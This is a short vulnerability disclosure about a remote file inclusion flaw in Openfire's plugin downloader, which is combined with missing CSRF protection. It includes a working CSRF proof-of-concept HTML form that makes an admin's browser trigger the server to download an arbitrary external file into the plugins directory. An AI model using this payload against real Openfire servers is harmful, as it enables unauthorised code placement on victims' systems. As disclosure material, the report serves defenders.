hyp3rlinx reported that Openfire v3.10.2 suffers from a Remote File Inclusion (RFI) vulnerability.
In "available-plugins.jsp" there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet.
On line 40: all that needs to be satisfied is that the paramater is not null.
If the above condition check returns true, the application downloads whatever file you give it.
1) Download arbitrary file, e.g.
Our RFI will then be downloaded to the "openfire\plugins" directory.
Re-tested this on the latest Openfire 4.0.0 beta and still present.
Re-tested this is still present in 4.1 beta
Noted there is no CSRF on this, so the download of a file to server can be initiated via CSRF against the admins browser.
<!-- CSRF PoC - generated by Burp Suite Professional -->
<form action="https://192.168.56.103:9091/dwr/exec/downloader.installPlugin.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1 c0-scriptName=downloader c0-methodName=installPlugin c0-id=576_1481902916818 c0-param0=string:https%3A%2F%2Fdownload.microsoft.com%2Fdownload%2F4%2F4%2F9%2F449b0038-ac27-4b24-bf11-dd8ebdf5cca6%2Fsonar_setup.exe c0-param1=string:1164973806 xml=true " />
<input type="submit" value="Submit request" />